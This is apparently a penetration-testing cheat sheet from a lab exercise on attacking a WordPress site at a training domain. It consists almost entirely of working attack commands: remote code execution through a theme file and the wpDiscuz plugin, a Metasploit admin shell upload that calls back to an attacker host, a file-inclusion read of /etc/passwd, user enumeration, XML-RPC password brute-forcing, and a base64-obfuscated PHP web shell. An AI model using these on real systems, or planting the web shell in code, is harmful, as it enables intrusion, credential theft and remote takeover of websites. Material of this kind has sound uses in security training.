2.-Attacking-wordpress

1. Manual Code Execution via Theme Editor (404.php)

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

2. Metasploit wp_admin_shell_upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

3. mail-masta LFI Exploit

curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

4. wpDiscuz RCE Exploit

Python Script Method

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

Curl Method

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

5. WordPress REST API User Enumeration

curl -s http://blog.inlanefreight.local/wp-json/wp/v2/users

6. XML-RPC Brute Force (system.multicall)

python3 xmlrpc_bruteforce.py -u http://blog.inlanefreight.local/xmlrpc.php -U users.txt -P passwords.txt

7. wp-config.php Exposure Check

curl -s http://blog.inlanefreight.local/wp-config.php

8. Web Shell Obfuscation Example

<?php eval(base64_decode("c3lzdGVtKCRfR0VUWyJjbWQiXSk7")); ?>

Last updated